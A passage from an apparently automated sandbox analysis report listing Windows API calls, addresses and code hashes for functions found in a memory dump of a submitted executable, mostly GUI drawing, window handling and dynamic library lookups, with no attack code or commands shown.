                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: Text$A480A570CreateExtentFontIndirectMetricsObjectPointSelect
                                                    • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
                                                    • API String ID: 1435929781-222967699
                                                    • Opcode ID: 8e4816187cf5e8e7c6dd84ba3c8161288e1479147e1e53052227e353a50aa1d3
                                                    • Instruction ID: 4a1d9e00790e4e8279befe01d539e981fbc0a950f87c09723c3c89301347e02c
                                                    • Opcode Fuzzy Hash: 8e4816187cf5e8e7c6dd84ba3c8161288e1479147e1e53052227e353a50aa1d3
                                                    • Instruction Fuzzy Hash: FA015E76A44604AFDB14DBA9CC41E5EB7ECDB48704F610476B604E7281DA78AE008B6C
                                                    APIs
                                                    • SelectObject.GDI32(00000000,?), ref: 0041B468
                                                    • SelectObject.GDI32(?,00000000), ref: 0041B477
                                                    • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4A3
                                                    • SelectObject.GDI32(00000000,00000000), ref: 0041B4B1
                                                    • SelectObject.GDI32(?,00000000), ref: 0041B4BF
                                                    • DeleteDC.GDI32(00000000), ref: 0041B4C8
                                                    • DeleteDC.GDI32(?), ref: 0041B4D1
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: ObjectSelect$Delete$Stretch
                                                    • String ID:
                                                    • API String ID: 1458357782-0
                                                    • Opcode ID: 72b6a28bf9d60e237e3396a0a8e2fc7d77968e10b7c0149e345d15a7b5d8e936
                                                    • Instruction ID: d121cbdfe682723b668f1aba97a5ca8eb2ba63952d9ca8216d3140e682204302
                                                    • Opcode Fuzzy Hash: 72b6a28bf9d60e237e3396a0a8e2fc7d77968e10b7c0149e345d15a7b5d8e936
                                                    • Instruction Fuzzy Hash: 46115C72E00619ABDB10DAD9DD85FEFB7BCEF08704F144555B614F7281C678AC418BA8
                                                    APIs
                                                    • GetCursorPos.USER32 ref: 004233A7
                                                    • WindowFromPoint.USER32(?,?), ref: 004233B4
                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004233C2
                                                    • GetCurrentThreadId.KERNEL32 ref: 004233C9
                                                    • SendMessageA.USER32(00000000,00000084,?,?), ref: 004233E2
                                                    • SendMessageA.USER32(00000000,00000020,00000000,00000000), ref: 004233F9
                                                    • SetCursor.USER32(00000000), ref: 0042340B
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
                                                    • String ID:
                                                    • API String ID: 1770779139-0
                                                    • Opcode ID: c9ba26483528a121f971c2dd70aae3c664ebef1f4767206ef3dc65e1b1b17165
                                                    • Instruction ID: 5b5036a29de233914ad27f5bfe0a39b591155b03ca34aa4f0141610fd726b6de
                                                    • Opcode Fuzzy Hash: c9ba26483528a121f971c2dd70aae3c664ebef1f4767206ef3dc65e1b1b17165
                                                    • Instruction Fuzzy Hash: 3501D4323046102AD6217B755C82E2F26E8DB85B29F60447FF504BB287DA3DAD11936D
                                                    APIs
                                                    • GetModuleHandleA.KERNEL32(user32.dll), ref: 00494848
                                                    • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 00494855
                                                    • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00494862
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$HandleModule
                                                    • String ID: GetMonitorInfoA$MonitorFromRect$user32.dll
                                                    • API String ID: 667068680-2254406584
                                                    • Opcode ID: 21af07142c53872dca5cd0674b34382539a139ddeec0bf3a3c9dc52e9c6734d9
                                                    • Instruction ID: 57979f0f623c6713f86cfc51a9e85cc39870524a60e3ac3170e58067450f8277
                                                    • Opcode Fuzzy Hash: 21af07142c53872dca5cd0674b34382539a139ddeec0bf3a3c9dc52e9c6734d9
                                                    • Instruction Fuzzy Hash: 68F0F69AB01F5526DA20B5A69C42E7B6ACCCBC17A4F150137FD04B73C2E99C8C0242FD
                                                    APIs
                                                    • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompressInit), ref: 0045D4B1
                                                    • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompress), ref: 0045D4C1
                                                    • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompressEnd), ref: 0045D4D1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: AddressProc
                                                    • String ID: BZ2_bzDecompress$BZ2_bzDecompressEnd$BZ2_bzDecompressInit
                                                    • API String ID: 190572456-212574377
                                                    • Opcode ID: cecd0a63045edb33e2202c29c90cf8f934e5a60212dd894f2f8d3c432b3cebaf
                                                    • Instruction ID: 50a43070f27201e9cf87661d87b97551d06431c7276cd5b4b6d770057bc484c9
                                                    • Opcode Fuzzy Hash: cecd0a63045edb33e2202c29c90cf8f934e5a60212dd894f2f8d3c432b3cebaf
                                                    • Instruction Fuzzy Hash: 4AF0B2B0D00701DAE724DFB65CC77263A959B6431AF1084379A4D55373D67814498F2D
                                                    APIs
                                                    • GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilterEx,00000004,00499934,00457011,004573B4,00456F68,00000000,00000B06,00000000,00000000,00000001,00000000,00000002,00000000,004808CA), ref: 0042EA2D
                                                    • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EA33
                                                    • InterlockedExchange.KERNEL32(0049B668,00000001), ref: 0042EA44
                                                      • Part of subcall function 0042E9A4: GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042EA68,00000004,00499934,00457011,004573B4,00456F68,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E9BA
                                                      • Part of subcall function 0042E9A4: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9C0
                                                      • Part of subcall function 0042E9A4: InterlockedExchange.KERNEL32(0049B660,00000001), ref: 0042E9D1
                                                    • ChangeWindowMessageFilterEx.USER32(00000000,?,00000001,00000000,00000004,00499934,00457011,004573B4,00456F68,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042EA58
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: AddressExchangeHandleInterlockedModuleProc$ChangeFilterMessageWindow
                                                    • String ID: ChangeWindowMessageFilterEx$user32.dll
                                                    • API String ID: 142928637-2676053874
                                                    • Opcode ID: 527a2f903435c6b8eae660c7438eac079e405392c9f84945f8436c24f6679cfa
                                                    • Instruction ID: b6413d45aefc5bd916056b1696ea31cacbebf8ca5ba9e8247451a7316c99a6de
                                                    • Opcode Fuzzy Hash: 527a2f903435c6b8eae660c7438eac079e405392c9f84945f8436c24f6679cfa
                                                    • Instruction Fuzzy Hash: C9E092A1741720EAEE10B7BA7D86FAA2558EB5072DF540037F100A51E1C7BD1C80CE9E
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(oleacc.dll,?,0044F081), ref: 0044C7E3
                                                    • GetProcAddress.KERNEL32(00000000,LresultFromObject), ref: 0044C7F4
                                                    • GetProcAddress.KERNEL32(00000000,CreateStdAccessibleObject), ref: 0044C804
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$LibraryLoad
                                                    • String ID: CreateStdAccessibleObject$LresultFromObject$oleacc.dll
                                                    • API String ID: 2238633743-1050967733
                                                    • Opcode ID: 20d4d3efedc32434c77936c95fe9c73e42e1c540f2b792c07eccd7c7435f7152
                                                    • Instruction ID: ee0778b55076bf214b63aaf44073c79067fceb62e20c2f516a440ec7c4faf5ed
                                                    • Opcode Fuzzy Hash: 20d4d3efedc32434c77936c95fe9c73e42e1c540f2b792c07eccd7c7435f7152
                                                    • Instruction Fuzzy Hash: 2FF0FE70242302CAF750ABB5FDD97563694E7E471AF14237BE401551A1D7BD4444CB8C
                                                    APIs
                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,?,00498130), ref: 004786BA
                                                    • GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 004786C7
                                                    • GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 004786D7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$HandleModule
                                                    • String ID: VerSetConditionMask$VerifyVersionInfoW$kernel32.dll
                                                    • API String ID: 667068680-222143506
                                                    • Opcode ID: 037c1e48967f880c8f75eb608e42e3021eac6f548ba3101ad95a3bedc305e175
                                                    • Instruction ID: 2026d18a05cb2035c6a6e54b58e3f317de058d113ce64fa581f90165bcddcee3
                                                    • Opcode Fuzzy Hash: 037c1e48967f880c8f75eb608e42e3021eac6f548ba3101ad95a3bedc305e175
                                                    • Instruction Fuzzy Hash: F5C0E9F06C1701EA9640B7F15CDAD7A2558D520729720943F755EA6192D9BC4C104A6C
                                                    APIs
                                                    • GetFocus.USER32 ref: 0041B73D
                                                    • 73A1A570.USER32(?), ref: 0041B749
                                                    • 73A18830.GDI32(00000000,?,00000000,00000000,0041B814,?,?), ref: 0041B77E
                                                    • 73A122A0.GDI32(00000000,00000000,?,00000000,00000000,0041B814,?,?), ref: 0041B78A
                                                    • 73A26310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041B7F2,?,00000000,0041B814,?,?), ref: 0041B7B8
                                                    • 73A18830.GDI32(00000000,00000000,00000000,0041B7F9,?,?,00000000,00000000,0041B7F2,?,00000000,0041B814,?,?), ref: 0041B7EC
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: A18830$A122A26310A570Focus
                                                    • String ID:
                                                    • API String ID: 3906783838-0
                                                    • Opcode ID: 7028b3360e085542d185f93eaa985fb71498e3c9d3761fe797ea6f9089370fd6
                                                    • Instruction ID: 1a6b37f464f6ee1ac690d44aa7d10d16b676852f44f67843991ec4a9ec0a7b01
                                                    • Opcode Fuzzy Hash: 7028b3360e085542d185f93eaa985fb71498e3c9d3761fe797ea6f9089370fd6
                                                    • Instruction Fuzzy Hash: D9512070A002099FCF11DFA9C891AEEBBF8EF49704F10446AF514A7790D7799981CBA9
                                                    APIs
                                                    • GetFocus.USER32 ref: 0041BA0F
                                                    • 73A1A570.USER32(?), ref: 0041BA1B
                                                    • 73A18830.GDI32(00000000,?,00000000,00000000,0041BAE1,?,?), ref: 0041BA55
                                                    • 73A122A0.GDI32(00000000,00000000,?,00000000,00000000,0041BAE1,?,?), ref: 0041BA61
                                                    • 73A26310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041BABF,?,00000000,0041BAE1,?,?), ref: 0041BA85
                                                    • 73A18830.GDI32(00000000,00000000,00000000,0041BAC6,?,?,00000000,00000000,0041BABF,?,00000000,0041BAE1,?,?), ref: 0041BAB9
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: A18830$A122A26310A570Focus
                                                    • String ID:
                                                    • API String ID: 3906783838-0
                                                    • Opcode ID: 6afe2cc59a527faaede1d3d34b45dc336484c23e3dd063350b4c8de36bb0c79b
                                                    • Instruction ID: 148f6e74122d55113d3717465da8055643ee1b9490db959cdfcac8ccc7d3b8de
                                                    • Opcode Fuzzy Hash: 6afe2cc59a527faaede1d3d34b45dc336484c23e3dd063350b4c8de36bb0c79b
                                                    • Instruction Fuzzy Hash: FC513975A002089FDB11DFA9C881AAEBBF9FF49700F114466F904EB750D738AD40CBA8
                                                    APIs
                                                    • GetFocus.USER32 ref: 0041B576
                                                    • 73A1A570.USER32(?,00000000,0041B650,?,?,?,?), ref: 0041B582
                                                    • 73A24620.GDI32(?,00000068,00000000,0041B624,?,?,00000000,0041B650,?,?,?,?), ref: 0041B59E
                                                    • 73A4E680.GDI32(?,00000000,00000008,?,?,00000068,00000000,0041B624,?,?,00000000,0041B650,?,?,?,?), ref: 0041B5BB
                                                    • 73A4E680.GDI32(?,00000000,00000008,?,?,00000000,00000008,?,?,00000068,00000000,0041B624,?,?,00000000,0041B650), ref: 0041B5D2
                                                    • 73A1A480.USER32(?,?,0041B62B,?,?), ref: 0041B61E
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: E680$A24620A480A570Focus
                                                    • String ID:
                                                    • API String ID: 3709697839-0
                                                    • Opcode ID: b97e33ea795034c912b2e17a9f5d54d6d1d1af920c0d7a51194e8edd97010b3d
                                                    • Instruction ID: df8759ecd31a85a201270414174f0a8fa00d18147156f7fa6755a0b35bba35d1
                                                    • Opcode Fuzzy Hash: b97e33ea795034c912b2e17a9f5d54d6d1d1af920c0d7a51194e8edd97010b3d
                                                    • Instruction Fuzzy Hash: E9410831A00258AFCB10DFA9C885AAFBBB4EF59704F1484AAF500EB351D3389D50CBA5
                                                    APIs
                                                    • SetLastError.KERNEL32(00000057,00000000,0045CF38,?,?,?,?,00000000), ref: 0045CED7
                                                    • SetLastError.KERNEL32(00000000,00000002,?,?,?,0045CFA4,?,00000000,0045CF38,?,?,?,?,00000000), ref: 0045CF16
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast
                                                    • String ID: CLASSES_ROOT$CURRENT_USER$MACHINE$USERS
                                                    • API String ID: 1452528299-1580325520
                                                    • Opcode ID: 76cc67341227ff3c05617fb08029e3d04d7592c217e5ac47b77cb7a8c66e2160
                                                    • Instruction ID: 04ddcdc8736abbc18e914b4e1455ed0448250d7d0c77fa2ba5441d80ccfd4ce1
                                                    • Opcode Fuzzy Hash: 76cc67341227ff3c05617fb08029e3d04d7592c217e5ac47b77cb7a8c66e2160
                                                    • Instruction Fuzzy Hash: C7118736204304FFDB11DA91C9C2AAEB69EDB44746F6040776D00967C3D67C9F0AE56D
                                                    APIs
                                                    • GetSystemMetrics.USER32(0000000B), ref: 0041BDCD
                                                    • GetSystemMetrics.USER32(0000000C), ref: 0041BDD7
                                                    • 73A1A570.USER32(00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BDE1
                                                    • 73A24620.GDI32(00000000,0000000E,00000000,0041BE54,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE08
                                                    • 73A24620.GDI32(00000000,0000000C,00000000,0000000E,00000000,0041BE54,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE15
                                                    • 73A1A480.USER32(00000000,00000000,0041BE5B,0000000E,00000000,0041BE54,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE4E
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: A24620MetricsSystem$A480A570
                                                    • String ID:
                                                    • API String ID: 4042297458-0
                                                    • Opcode ID: b7d5d08e3e19f48413646ae1536af481ff140cf83ce15b3b4f218d501696187d
                                                    • Instruction ID: 747e2eb1a3f7a7c841cace1b59abe43854f3131f67fff351bf4eed9cd228abed
                                                    • Opcode Fuzzy Hash: b7d5d08e3e19f48413646ae1536af481ff140cf83ce15b3b4f218d501696187d
                                                    • Instruction Fuzzy Hash: 98215974E00748AFEB10EFA9C942BEEBBB4EB48714F10842AF514B7280D7785D40CB69
                                                    APIs
                                                    • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,00401B68), ref: 00401ABD
                                                    • LocalFree.KERNEL32(008123C0,00000000,00401B68), ref: 00401ACF
                                                    • VirtualFree.KERNEL32(?,00000000,00008000,008123C0,00000000,00401B68), ref: 00401AEE
                                                    • LocalFree.KERNEL32(008133C0,?,00000000,00008000,008123C0,00000000,00401B68), ref: 00401B2D
                                                    • RtlLeaveCriticalSection.KERNEL32(0049B420,00401B6F), ref: 00401B58
                                                    • RtlDeleteCriticalSection.KERNEL32(0049B420,00401B6F), ref: 00401B62
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                    • String ID:
                                                    • API String ID: 3782394904-0
                                                    • Opcode ID: ef0d8b2142be7cf42810e170793bf0a6b8446fdea194a224c38922696d0a74e0
                                                    • Instruction ID: 79795942c165c44483fb09e1962e32eaca51f8de38df00e9c029d8aa05623ce8
                                                    • Opcode Fuzzy Hash: ef0d8b2142be7cf42810e170793bf0a6b8446fdea194a224c38922696d0a74e0
                                                    • Instruction Fuzzy Hash: 3B118E30A003405AEB15AB65BE85B263BA5D761B08F44407BF80067BF3D77C5850E7AE
                                                    APIs
                                                    • GetWindowLongA.USER32(?,000000EC), ref: 0047DDAE
                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC,?,0046CB69), ref: 0047DDD4
                                                    • GetWindowLongA.USER32(?,000000EC), ref: 0047DDE4
                                                    • SetWindowLongA.USER32(?,000000EC,00000000), ref: 0047DE05
                                                    • ShowWindow.USER32(?,00000005,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC), ref: 0047DE19
                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000057,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000), ref: 0047DE35
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: Window$Long$Show
                                                    • String ID:
                                                    • API String ID: 3609083571-0
                                                    • Opcode ID: 69fb56ec72bb48bf799d73a9f514c3e84a97c3b26dbd79650f0c817e19817d20
                                                    • Instruction ID: 8d1f2698ea79badf96abf755c5a3f857121e06e6ffc739f26560ae4cefe558a1
                                                    • Opcode Fuzzy Hash: 69fb56ec72bb48bf799d73a9f514c3e84a97c3b26dbd79650f0c817e19817d20
                                                    • Instruction Fuzzy Hash: CA0112B5651610ABE700D768DE45F7637E8AF1C324F094266B659DF3E3C738E8408B49
                                                    APIs
                                                      • Part of subcall function 0041A6D8: CreateBrushIndirect.GDI32 ref: 0041A743
                                                    • UnrealizeObject.GDI32(00000000), ref: 0041B274
                                                    • SelectObject.GDI32(?,00000000), ref: 0041B286
                                                    • SetBkColor.GDI32(?,00000000), ref: 0041B2A9
                                                    • SetBkMode.GDI32(?,00000002), ref: 0041B2B4
                                                    • SetBkColor.GDI32(?,00000000), ref: 0041B2CF
                                                    • SetBkMode.GDI32(?,00000001), ref: 0041B2DA
                                                      • Part of subcall function 0041A050: GetSysColor.USER32(?), ref: 0041A05A
